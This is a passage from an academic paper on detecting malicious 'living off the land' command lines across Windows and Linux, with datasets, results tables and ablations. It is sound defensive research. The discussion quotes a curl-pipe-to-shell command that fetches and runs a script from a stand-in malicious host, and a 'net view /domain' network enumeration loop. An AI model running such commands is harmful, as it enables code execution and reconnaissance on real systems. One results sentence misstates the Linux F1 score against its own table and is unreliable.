Due to the lack of publicly available datasets for command line detection, this paper combines multiple data sources to construct the dataset shown in Table 5. The data sources consist of three parts. We mainly collect data from a security company with over 8000 regular employees. This company serves more than 5000 enterprise users. The data is also from real customer deployment scenarios. Therefore, we have taken privacy protection measures for the command-line data by converting relevant file names and user names into the symbol " * "; Malicious command line examples constructed using Metasploit (https://www.metasploit.com/), PowerSploit (https://github.com/powershellmafia/powersploit), and CobaltStrike (https://www.cobaltstrike.com) penetration tools; Malicious command line code collected from GitHub (https://lolbas-project.github.io/, https://wadcoms.github.io/, https://lofl-project.github.io/). It is worth noting that we invited three security experts with over 30 years of service in the company to label and classify the data, ensuring coverage of the 14 tactical stages included in ATT&CK, such as Execution, Privilege Escalation, and Exfiltration.
Since previous research on command lines has been relatively singular, basically focusing on a single platform, the portability of command line detection to other platforms is relatively poor. We hope to create a more universally applicable model that can detect malicious command lines across multiple platforms. Therefore, when collecting data, we collected command lines from both the Windows and Linux platforms.
Table 5. Detailed command line information
Platform | Normal | Suspicious | Malicious |
|---|---|---|---|
Windows | 24687 | 1370 | 1391 |
Linux | 26230 | 639 | 224 |
By observing Table 5, it can be found that there may be an imbalance in the number of attack and non-attack sequences in the training set. The reason for this situation is that the number of attack entities in the audit logs is less than the number of non-attack entities. For example, in the Windows dataset we collected, the number of attack entities is 1,391, the number of suspicious entities is 1,370, and the number of non-attack entities is 24,687. Training a classifier with this unbalanced dataset may bias it towards the majority class (non-attack), or it may fail to learn from the minority class (attack or suspicious). To balance the training dataset, LOTLDetector first undersamples non-attack sequences with a certain similarity threshold. Then, it uses an oversampling mechanism to randomly vary these attack and suspicious sequences until their total number reaches the same as the non-attack sequences. A simple technique for balancing the training dataset is either to replicate the number of samples in the minority class or to randomly delete the number of samples in the majority class. However, our initial prototype showed that this method led to the model overfitting specific attack patterns or missing many important non-attack patterns. To address these issues, LOTLDetector employs the two mechanisms described in detail below.
Undersampling: LOTLDetector calculates the similarity between command line texts through Levenshtein distance, thereby reducing the number of non-attack samples. It measures the similarity between texts by calculating the minimum number of editing operations required to transform one string into another. The LOTLDetector uses this distance calculation method to filter out command line text sequences with similarity exceeding a set threshold. In our experiments, we found that setting a similarity threshold of 80% can achieve an appropriate undersampling ratio, effectively filtering out highly similar and redundant command line text sequences.
Oversampling: LOTLDetector uses a mutation-based oversampling mechanism to include a greater variety of attack and suspicious samples in the training dataset. The LOTLDetector randomly mutates a lexical word type into another lexical word of the same type. This process does not fundamentally change the mutated sequence; however, it increases the number of similar sequences, ensuring that the model’s training dataset remains balanced.
Evaluation strategy
In our experiments, we used two evaluation strategies. The first is an intra-dataset evaluation strategy (denoted as intra-evaluation), where the model is trained on 80% of the samples in the Windows and Linux datasets and tested on the remaining 20% of the samples within the same dataset. The second is an inter-dataset evaluation strategy (denoted as inter-evaluation), where the model uses the Windows command line dataset as the training set and then tests on the Linux command line dataset, or vice versa, using the Linux command line dataset as the training set and testing on the Windows command line dataset.
To evaluate the performance of the LOTLDetector, we used four evaluation metrics: accuracy, precision, recall, and F1 score, which are standard evaluation measures for classification tasks. Additionally, since this is a multi-class classification task, the calculation method for each class i’s evaluation metrics is as follows:
1
2
3
4
where represents the number of samples predicted as class i and actually are class i. represents the number of samples predicted not to be class i and actually are not class i. represents the number of samples predicted as class I but whose actual class is not i. represents the number of samples that are actually class i but are predicted not to be class i.Evaluation experiment
Comparative experiment
To investigate the competitive performance of our system, we compared LOTLDetector with the following malicious command-line detection models.
Fang et al. (2021): Manually extracted features of PowerShell scripts from three aspects: text, functions, and abstract syntax trees, and automatically used the FastText model to output the encoding vectors of the scripts. Then, these two features were directly combined and input into a random forest classifier for classification.
Boroȩt al. (2022): A set of rules is predefined through expert knowledge, and a regular matching method is used to match each possible feature in the command line; then this set of features is used to train the classifier.
Ding et al. (2023): A word embedding model is used to project semantically similar words into approximate vectors in the embedding space with contextual word embeddings, thereby converting command line text into a word vector matrix, which is then fed into the model for learning and classification.
Ablation study
1) Evaluation of different components. In this experiment, we aimed to evaluate the performance of three key components in the LOTLDetector (de-obfuscation, rule extraction, and standardization). In this experiment, we conducted intra-dataset evaluation on the Windows dataset, testing a total of six schemes.
de-obfuscation: This approach involves training the model using only the deobfuscated command line text from the original command lines.
Rule Extraction: This approach involves training the model using only the extracted rule tags from the original command lines.
Standardization: This approach involves training the model using only the standardized command-line text that has been processed.
de-obfuscation + Rule Extraction: Training the model using both the de-obfuscated command line text and the extracted rule tags.
de-obfuscation + Standardization: Training the model using the command line text that has undergone both de-obfuscation and standardization processes.
Rule Extraction + Standardization: Training the model using the extracted rule tags and the standardized command line text.
Word Token: This scheme directly extracts word tokens from the command line and uses the extracted word token as the only input to the model.
Rule Label: This scheme directly matches rules against the command line, extracts rule label, and uses the rule label as the only input to the model.
Similarity Label: This scheme directly compares the similarity of the command line, extracts similarity label, and uses the similarity label as the only input to the model.
Word Token + Rule Label: This scheme simultaneously extracts word token and matches rules against the command line, using both word token and rule label as inputs to the model.
Word Token + Similarity Label: This scheme simultaneously extracts word token and compares the similarity of the command line, using both word token and similarity label as inputs to the model.
Rule Label + Similarity Label: This scheme only matches rules and compares the similarity of the command line, using both rule label and similarity label as inputs to the model.
Performance Overhead
In order to evaluate the computational efficiency of LOTLDetector and ensure its feasibility in practical deployment, we assessed the performance overhead of LOTLDetector when processing different numbers of command lines on the Windows dataset.
Evaluation result
Comparative experiment
The experimental results are shown in Table 6 (intra-evaluation, within-dataset evaluation strategy) and Table 7 (inter-evaluation, between-dataset evaluation strategy), where the definition of the between-dataset evaluation strategy is Windows->Linux, indicating that the model is trained on the Windows dataset and tested on the Linux dataset. Similarly, Linux->Windows indicates that the model is trained on the Linux dataset and tested on the Windows dataset. Firstly, current work on malicious command-line detection focuses only on the detection of benign tools’ white utilization on a single platform. Boroȩt al. (2022) studied system tools in the whitelist on the Windows operating system, while Ding et al. (2023) studied system tools in the whitelist on the Linux operating system. It can be seen that although these methods show good performance within their respective platform datasets, they perform poorly when performing cross-platform detection, and the model needs to be retrained for cross-platform detection. However, the LOTLDetector, through the method of predefined rules and similarity tags, even on the between-dataset evaluation strategy, has a better F1 score performance than Ding et al. (2023) and Boroȩt al. (2022). Secondly, the method of transforming text into feature vectors through natural language processing is generally better than the model based solely on predefined rules for feature engineering, as these predefined rules rely too much on expert knowledge, and the quality of the model is directly dependent on the definition of the rules. For example, Ding et al. (2023) overall performance is also better than Boroȩt al. (2022), whether in the within-dataset evaluation strategy or the between-dataset evaluation strategy.
Third, Boros et al. (2022) employed a random forest model to classify the originally collected command-line data through rule extraction. However, this method did not perform deobfuscation and standardization on the data, leading to suboptimal performance when facing complex and obfuscated command-line data. Similarly, Ding et al. (2023) approached the problem purely from the perspective of deep learning, extracting features to complete the detection of command lines, but also did not perform deobfuscation on the data. This makes it difficult for deep learning models to extract text features, thereby affecting the detection effect. In contrast, the LOTL Detector clarifies the structure of command-line text through deobfuscation operations. On this basis, by combining predefined rules and word embedding technology from natural language processing, it significantly enhances the detection performance of malicious command lines. Specifically, the malicious command line rules predefined according to expert knowledge can effectively detect known malicious command lines; whereas word embeddings based on natural language processing, by learning the text features of existing malicious command lines, achieve the detection of unknown malicious command lines. This combination has achieved a high F1 score (0.9598) in the evaluation strategy within the dataset, fully demonstrating its effectiveness in the detection of malicious command lines.
Fourth, although the research object of Fang et al. (2021) is PowerShell scripts, their approach to processing the scripts is to directly remove tabs and newline characters, converting the PowerShell scripts into single-line text. We also compare this method with our command-line detection system here. Since there are still certain differences in text structure between script files and command lines, we only manually extract text-level features in this case. The text-level features extracted by this system include: special variable names (such as “cmd” and “Shell”), the number of character occurrences (taking the top five most frequent characters), and URLs/IP addresses. The results show that detection methods suitable for PowerShell scripts are not necessarily suitable for command-line detection. This is because the text length of command lines is inevitably shorter than that of scripts, which makes it difficult to effectively count the number of special variable names and characters. Moreover, the complexity of the text structure of command lines is not comparable to that of PowerShell scripts, making it impossible to extract corresponding abstract syntax tree node features.
Finally, as shown in Table 6, we observed that the performance of the LOTLDetector on the Linux dataset (F1 score of 0.9598) is slightly better than that on the Windows dataset (F1 score of 0.9598). Although the performances are very close, the performance on the Linux dataset is slightly higher. We believe that the reasons for this phenomenon are as follows: Linux command lines usually have a more concise and standardized structure, while Windows command lines may contain more complex paths and parameters. This structural difference enables the model to more effectively extract features when processing Linux command lines, thereby improving detection accuracy. There are relatively fewer command-line tools in the Linux system with more concentrated functions. At the same time, there is a wide variety of command-line tools in the Windows system with complex functions. This diversity increases the learning difficulty of the model on the Windows dataset, resulting in a slight decrease in detection accuracy.
Table 6. Intra-evaluation: within dataset evaluation strategy
Dataset | Model | Accuracy | Precision | Recall | F1-Score |
|---|---|---|---|---|---|
Windows | Fang et al. (2021) | 0.8934 | 0.9074 | 0.9098 | 0.8970 |
Boros et al. (2022) | 0.8211 | 0.8186 | 0.8174 | 0.8157 | |
Ding et al. (2023) | 0.8868 | 0.8954 | 0.8866 | 0.8874 | |
LOTLDetector | 0.9598 | 0.9601 | 0.9598 | 0.9598 | |
Linux | Fang et al. (2021) | 0.9066 | 0.9067 | 0.9145 | 0.9238 |
Boros et al. (2022) | 0.9123 | 0.9145 | 0.9125 | 0.9121 | |
Ding et al. (2023) | 0.9135 | 0.9242 | 0.9140 | 0.9141 | |
LOTLDetector | 0.9728 | 0.9737 | 0.9725 | 0.9727 |
Table 7. Inter-evaluation: cross dataset evaluation strategy
Dataset | Model | Accuracy | Precision | Recall | F1-Score |
|---|---|---|---|---|---|
Windows->Linux | Fang et al. (2021) | 0.8937 | 0.5979 | 0.5023 | 0.6478 |
Boros et al. (2022) | 0.4306 | 0.4981 | 0.4362 | 0.3456 | |
Ding et al. (2023) | 0.9589 | 0.3664 | 0.3435 | 0.3424 | |
LOTLDetector | 0.9676 | 0.6592 | 0.8841 | 0.7410 | |
Linux->Windows | Fang et al. (2021) | 0.8564 | 0.5077 | 0.4187 | 0.4775 |
Boros et al. (2022) | 0.3190 | 0.2667 | 0.3467 | 0.2022 | |
Ding et al. (2023) | 0.8974 | 0.5189 | 0.3670 | 0.3773 | |
LOTLDetector | 0.8988 | 0.6367 | 0.6724 | 0.6532 |
Ablation study
1) Evaluation of different components. The experimental results are shown in Table 8. First, the combination of de-obfuscation and standardization successfully increased the F1 score to 0.9576 when compared to using de-obfuscation and standardization separately, further proving that their combination can make the command line text structure clearer and easier for the model to extract effective textual features. Second, when it comes to rule extraction, both de-obfuscation + rule extraction and standardization + rule extraction achieved varying degrees of improvement in the F1 score, compensating for the shortcomings of relying solely on rule extraction, where the quality of the predefined rules affects the model’s performance. Third, the experimental results also proved that relying solely on expert knowledge for detecting malicious command lines has significant drawbacks. For example, in the experiment that used only rule extraction, the F1 score was only 0.8276, which is much lower than the performance of models using other methods, because the quality of the rule definition directly determines the model’s performance. Too broad a definition can lead to the problem of alarm fatigue, while too strict a definition can lead to missed reporting. Fourth, we found that the deobfuscation + rule extraction method led to a decrease in the overall performance of the model compared to using deobfuscation alone. However, the deobfuscation + normalization method improved the overall performance of the model compared to using deobfuscation alone. We analyzed that this might be because the normalization operation reduced the complexity of the command lines, enhanced the model’s generalization ability, and enabled the model to more effectively extract key features, thereby improving detection accuracy. Therefore, the deobfuscation + rule extraction method, without normalization, failed to extract powerful rule tags due to the presence of too many common texts in the command lines (such as IP addresses, file paths, etc.), which affected detection accuracy. Finally, command line data that has undergone de-obfuscation, standardization, and rule extraction operations can effectively improve the model’s detection capabilities. For instance, LOTLDetector achieved an F1 score of 0.9598.
Table 8. Effects of different components on windows dataset
de-obfuscation | Rule Extraction | Standardization | de-obfuscation + Rule Extraction | de-obfuscation + Standardization | Rule Extraction + Standardization | LOTLDetector | |
|---|---|---|---|---|---|---|---|
Accuracy | 0.9390 | 0.8212 | 0.9518 | 0.8644 | 0.9574 | 0.8806 | 0.9598 |
Precision | 0.9397 | 0.8185 | 0.9520 | 0.8703 | 0.9577 | 0.8855 | 0.9601 |
Recall | 0.9391 | 0.8188 | 0.9520 | 0.8643 | 0.9575 | 0.8809 | 0.9598 |
F1-Score | 0.9391 | 0.8276 | 0.9517 | 0.8660 | 0.9576 | 0.8817 | 0.9598 |
2) Evaluation of different features. The experimental results are shown in Table 9. First, the performance of word token + similarity label is better than that of the word token alone. For example, integrating similarity label into LOTLDetector increased the F1 score from 0.9552 to 0.9570, further proving the effectiveness of the extracted similarity label as supplementary information to word token. Word token + rule label also outperformed word token alone, validating the effectiveness of rule label. Second, when using word token, rule label, and similarity label individually, the performance of rule label and similarity label was far inferior to that of the word token, indicating that the word token is the most important feature in our system, and the other two features can only serve as nn information to word token. Finally, LOTLDetector outperformed word token + similarity label, indicating that when similarity label are not fully covered, rule label can provide additional information.
Table 9. Experimental effects of different input features
Word Token | Rule Label | Similarity Label | Word Token + Rule Label | Word Token + Similarity Label | Rule Label + Similarity Label | LOTLDetector | |
|---|---|---|---|---|---|---|---|
Accuracy | 0.9551 | 0.3132 | 0.3397 | 0.9563 | 0.9569 | 0.3397 | 0.9598 |
Precision | 0.9551 | 0.1815 | 0.1132 | 0.9565 | 0.9570 | 0.1132 | 0.9601 |
Recall | 0.9554 | 0.3083 | 0.3333 | 0.9564 | 0.9571 | 0.3333 | 0.9598 |
F1-Score | 0.9552 | 0.2051 | 0.1690 | 0.9564 | 0.9570 | 0.1690 | 0.9598 |
Figure 4 shows the ROC curves of the above six methods on the Windows dataset. The X-axis represents FPR (False Positive Rate), and the Y-axis represents TPR (True Positive Rate). The closer the curve is to the upper left corner, the better the model’s performance. From the figure, it can be seen that when only word tokens are initially used as the sole input to the model, the model’s performance is much higher than that of using rule labels and similarity labels individually, highlighting the importance of the word token feature. Second, we can also see that when word tokens are combined with rule labels and similarity labels, the model’s performance is further improved to varying degrees, indicating that rule labels and similarity labels provide a certain degree of supplementation to the information originally missing from word tokens.
[See PDF for image]
Fig. 4
ROC curves of different input features
Performance Overhead
The experimental results show that the testing time of LOTLDetector increases linearly with the number of command lines, indicating that the model has a good time complexity when dealing with large-scale data (Fig. 5a). Specifically, when processing 13,000 command lines, the testing time is about 100 min, which is acceptable in a real-time detection system. In addition, the average memory utilization of LOTLDetector is 559MB, and there is no trend of continuous increase when the data volume increases (Fig. 5b). This indicates that the model is efficient in resource consumption and will not cause significant system performance degradation. Finally, based on the performance overhead experimental results discussed above, LOTLDetector is expected to achieve the following performance in resource-constrained environments: first, the model features linear time complexity, enabling stable support for continuous real-time processing of large-scale command line data; second, during model execution, CPU utilization can be controlled within 20% and memory consumption remains consistently stable, which not only ensures that the SIEM system efficiently completes its core tasks of event analysis and alert response, but also prevents the overall system operational efficiency from being impacted by excessive model resource consumption.
[See PDF for image]
Fig. 5
The impact of different numbers of command lines on the performance of LOTLDetector
Discussion and future work
The experimental results show that LOTLDetector is capable of handling command-line data from both Windows and Linux platforms, which makes the model widely applicable in multi-operating system environments. By training and testing on datasets from different platforms, the model is able to effectively identify malicious command-line attacks. Through the integration of expert rules and deep learning techniques, the model achieves high-precision detection of malicious command lines and enhances detection performance through multi-layer deobfuscation algorithms and feature fusion. However, LOTLDetector can be further improved in the following two aspects.
The context of the command line environment. We have observed that many command lines used for malicious purposes are also used by ordinary users, but for different purposes. For example, the command "curl -s https://malicious-site.com/malicious.sh | sh" can download and execute a script file from a website. Since we categorized it as "suspicious" during training, our model will directly classify the command "curl -s https://benign-site.com/benign.sh | sh" as suspicious in its current stage due to the lack of command line context. However, in reality, the user is simply downloading a software installation script normally. Therefore, our work has also defined the "suspicious" class of commands. These commands are benign in themselves, but such benign commands are often executed prior to engaging in malicious activities. Taking the "net view" command as an example, this is a Windows system command used to view computer resources on the network. However, if we find in the logs that "net view" is followed by the command "for /f %i in (’net view /domain’) do net view %i", this command intends to collect sensitive information on the network, such as shared folders, printers, or other resources. This indicates that there may be unauthorized network scanning or information collection occurring in the network before lateral movement by a user. Now, looking at the "net view" command alone, its use is benign. However, after analyzing the context, we can determine that it is malicious. Currently, due to the limitations of our existing datasets, we are unable to provide the model with a complete command line context for training. Therefore, we cannot make detailed categorical judgments about such command lines based on specific context. The current lack of command-line context leads to a limitation in our system. In the future, our subsequent plans will be centered around Large Language Models (LLM) implementation, by transforming the hierarchical relationships of process trees or user behavior logs into semantic text that LLMs can parse, utilizing LLM’s reasoning capabilities to trace the source chain of processes, and automatically generating natural language explanations. Through this approach, process trees and user behavior logs can be transformed into effective contextual semantic information, which not only addresses the current model’s limitation of lacking context but also further enhances the interpretability of model decisions, helping analysts more intuitively understand the background and risk logic of suspicious command lines.
Model interpretability. As machine learning models are increasingly applied across various fields, model interpretability has gradually become a focal point for researchers. Numerous studies are dedicated to enhancing the interpretability of machine learning models using SHAP (SHapley Additive exPlanations) and LIME (Local Interpretable Model-agnostic Explanations) (Arreche et al. 2024; Hariharan et al. 2023). The core objective of these methods is to answer the critical question of "Why does the model make a specific prediction for a particular input? Which features drive the formation of the prediction result?" This highlights the importance of the interpretability of model outcomes. Upon deeper evaluation, we have found that when using SHAP for feature importance assessment, it requires considering all possible feature combinations to calculate Shapley values. However, when dealing with high-dimensional Word2Vec vectors, calculating all possible combinations becomes extremely impractical. For instance, with a 300-dimensional vector, the number of feature combinations reaches , which is computationally infeasible. For LIME, it generates perturbed samples locally to fit a simple model, but the high dimensionality and non-linear characteristics of Word2Vec vectors pose significant challenges in the generation of perturbed samples and subsequent interpretation work. Specifically, making minor changes to certain dimensions of the Word2Vec vector may lead to unpredictable changes in the model output, making it difficult for LIME to explain the model’s behavior accurately. Given these circumstances, the interpretability of model results is undoubtedly one of the important directions for our future research work. With the burgeoning development of large model technologies, we plan to explore the use of large model techniques to enhance the interpretability of model results in future work, in the hope of achieving breakthrough progress in this field.
Conclusion
This paper investigates the problem of detecting malicious command lines based on individual command lines. We propose a method for detecting malicious command lines called the LOTLDetector, which works by integrating expert knowledge and deep learning techniques. Specifically, the LOTLDetector utilizes command-line rules designed by security experts. It then creates a detection model for malicious command lines by jointly learning expert knowledge and completing command line text sequences. Through a series of experiments with command-line data collected from actual production environments and online resources, we have demonstrated that the LOTLDetector’s performance is significantly better than existing detection methods that rely solely on command-line text sequences, as well as those that rely solely on expert knowledge. The LOTLDetector also shows good adaptability in detecting new malicious command lines. This paper also discusses the limitations of the current work from two perspectives: the context of the command line environment and model interpretability, while outlining potential directions for future research.
Acknowledgements
Here, we sincerely want to express our gratitude to all those who have provided help and support during the research process of this article.
Author contributions
All authors have contributed to this manuscript and approve of this submission.
Funding
This work is supported in part by the following grants: Wenzhou Basic Scientific Research Projects under Grant No. G20240033. National Natural Science Foundation of China under Grant No. 62002324, and 62372410. Zhejiang Provincial Natural Science Foundation of China under Grant No. LQ21F020016. The Fundamental Research Funds for the Provincial Universities of Zhejiang under Grant No. RF-A2023009. Wenzhou Key Scientific and Technological Projects under Grant No.ZG2024007. "Pioneer" and "Leading Goose" R&D Program of Zhejiang under Grant No.2025C01082, and 2025C01013.
Data availability
If readers require it, we will consider providing our experimental data.
Declarations
Conflict of interest
The authors declare that they have no known competing financial interests or personal relationships that could have appeared to influence the work reported in this paper.
Publisher's Note
Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
References
Alsulami B, SrinivasanA, Dong H, Mancoridis S (2017) Lightweight behavioral malware detection for windows platforms. In: 2017 12th international conference on malicious and unwanted software (MALWARE), pp 75–81
Arreche, O; Guntur, T; Abdallah, M. Xai-ids: toward proposing an explainable artificial intelligence framework for enhancing network intrusion detection systems. Appl Sci; 2024; 14,
Barr-Smith F, Ugarte-Pedrero X, Graziano M, Spolaor R, Martinovic I(2021) Survivalism: systematic analysis of windows malware living-off-the-land. In: 2021 IEEE symposium on security and privacy (SP), pp 1557–1574. IEEE
Bohannon D. cmd.exe command obfuscation generator & detection test harness. https://github.com/danielbohannon/invoke-dosfuscation
Bohannon D. Revoke-obfuscation. https://github.com/d anielbohannon/revoke-obfuscation
Boros T, Cotaie A, Stan A, Vikramjeet K, Malik V, Davidson J (2022) Machine learning and feature engineering for detecting living off the land attacks. In: IoTBDS, pp 133–140
Chen, T; Zeng, H; Lv, M; Zhu, T. Ctimd: cyber threat intelligence enhanced malware detection using API call sequences with parameters. Comput. Secur.; 2024; 136, [DOI: https://dx.doi.org/10.1016/j.cose.2023.103518] 103518.
Crowdstrike 2024 global threat report. https://www.crowdstrike.com/global-threat-report/
Ding K, Zhang S, Yu F, Liu G (2023) Lolwtc: A deep learning approach for detecting living off the land attacks. In: 2023 IEEE 9th international conference on cloud computing and intelligent systems (CCIS), pp 176–181. IEEE
Downing E, Mirsky Y, Park K, Lee W (2021) DeepReflect: Discovering malicious functionality through binary reconstruction. In: 30th USENIX security symposium (USENIX Security 21), pp 3469–3486
Exploring the depths of cmd.exe obfuscation and detection techniques. https://i.blackhat.com/briefings/asia/2018/asia-18-bohannon-invoke_dosfuscation_techniques_for_fin_style_dos_level _cmd_obfuscation-wp.pdf
Fang V (2018) Malicious powershell detection via machine learning
Fang, Y; Zhou, X; Huang, C. Effective method for detecting malicious powershell scripts based on hybrid features . Neurocomputing; 2021; 448, pp. 30-39. [DOI: https://dx.doi.org/10.1016/j.neucom.2021.03.117]
Hariharan, SRR; Rejimol, R; Rendhir, PR; Ciza, T; Balakrishnan, N. Xai for intrusion detection system: comparing explanations based on global and local scope. J Compu Virol Hack Tech; 2023; 19,
Helpsystems. Cobalt strike—adversary simulation and red team operations. https://www.cobaltstrike.com
Hendler D, Kels S, Rubin A (2018) Detecting malicious powershell commands using deep neural networks. In: Proceedings of the 2018 on Asia conference on computer and communications security, pp 187–197
Hendler D, Kels S, Rubin A (2020) Amsi-based detection of malicious powershell code using contextual embeddings. In: Proceedings of the 15th ACM Asia conference on computer and communications security, pp 679–693
Joulin A, Grave E, Bojanowski P, Mikolov T (2016) Bag of tricks for efficient text classification. arXiv preprint arXiv:1607.01759
LeeJDMCK, Toutanova K (2018) Pre-training of deep bidirectional transformers for language understanding. arXiv preprint. arXiv:1810.04805
Li Z, Chen QA, Xiong C, Chen Y, Zhu T, Yang H (2019) Effective and light-weight deobfuscation and semantic-aware attack detection for powershell scripts. In: Proceedings of the 2019 ACM SIGSAC conference on computer and communications security, pp 1831–1847
Liu S, Peng G, Zeng H, Fu J (2023) A survey on the evolution of fileless attacks and detection techniques. Comput Secur. pp 103653
Liu C, Xia B, Yu M, Liu Y (2018) Psdem: a feasible de-obfuscation method for malicious powershell detection. In: 2018 IEEE symposium on computers and communications (ISCC), pp 825–831. IEEE
Living off the land binaries and scripts,https://informationsecurityasia.com/zh-cn/what-is-lolbas/#real-world_instances_of_lolbas_attacks_and_their_consequences
Living off the land: how to defend against malicious use of legitimate utilities (2022). https://threatpost.com/living-off-the-land-malicious-use-legitimate-utilities/177762/
Loflcab. https://lofl-project.github.io/
Lolbas, living off the land binaries, scripts and libraries. https://lolbas-project.github.io/
Malandrone GM, Virdis G, Giacinto G, Maiorca D, et al (2021) Powerdecode: a powershell script decoder dedicated to malware analysis. In: Proceedings of the Italian conference on cybersecurity, ITASEC 2021, vol 2940, pp 219–232
Metasploit. https://www.metasploit.com/
Microsoft. What is powershell?-powershell—microsoft docs. https://docs.microsoft.com/en-us/powershell/scripting/overview
Mikolov T (2013) Efficient estimation of word representations in vector space. arXiv preprint arXiv:1301.3781
Mitre. mitre att&ck framework. https://attack.mitre.org/
Ning R, Bu W, Yang J, Duan S (2023) A survey of detection methods research on living-off-the-land techniques. In: 2023 IEEE international conference on sensors, electronics and computer engineering (ICSECE), pp 159–164. IEEE
Ongun T, Stokes JW, Or JB, Tian K, Tajaddodianfar F, Neil J, Seifert C, Oprea A, Platt JC (2021) Living-off-the-land command detection using active learning. In: Proceedings of the 24th international symposium on research in attacks, intrusions and defenses, pp 442–455
Powersploit—a powershell post-exploitation framework.https://github.com/powershellmafia/powersploit
Rakhlin, A. Convolutional neural networks for sentence classification. GitHub; 2016; 6, 25.
Rusak G, Al-Dujaili A, O’Reilly U-M (2018) Ast-based deep learning for detecting malicious powershell. In: Proceedings of the 2018 ACM SIGSAC conference on computer and communications security, pp 2276–2278
Tsai, MH; Lin, CC; He, ZG; Yang, WC; Lei, CL. Powerdp: de-obfuscating and profiling malicious powershell commands with multi-label classifiers. IEEE Access; 2022; 11, pp. 256-270. [DOI: https://dx.doi.org/10.1109/ACCESS.2022.3232505]
Ugarte D, Maiorca D, Cara F, Giacinto G (2019) Powerdrive: accurate de-obfuscation and analysis of powershell malware. In: Detection of intrusions and malware, and vulnerability assessment: 16th international conference, DIMVA 2019, Gothenburg, Sweden, 2019, Proceedings 16, pp 240–259. Springer
Vaswani A (2017) Attention is all you need. Adv Neural Inf Process Syst
Wadcoms. https://wadcoms.github.io/
Wueest C, Anand H (2017) Internet security threat report-living off the land and fileless attack techniques
Yamin MM, Katt B (2019) Detecting malicious windows commands using natural language processing techniques. In: Innovative security solutions for information technology and communications: 11th international conference, SecITC 2018, Bucharest, Romania, Revised Selected Papers 11, pp 157–169. Springer
Yang, X; Peng, G; Zhang, D; Gao, Y; Li, C. Powerdetector: malicious powershell script family classification based on multi-modal semantic fusion and deep learning. China Commun; 2023; 20,
© The Author(s) 2026. This work is published under http://creativecommons.org/licenses/by/4.0/ (the “License”). Notwithstanding the ProQuest Terms and Conditions, you may use this content in accordance with the terms of the License.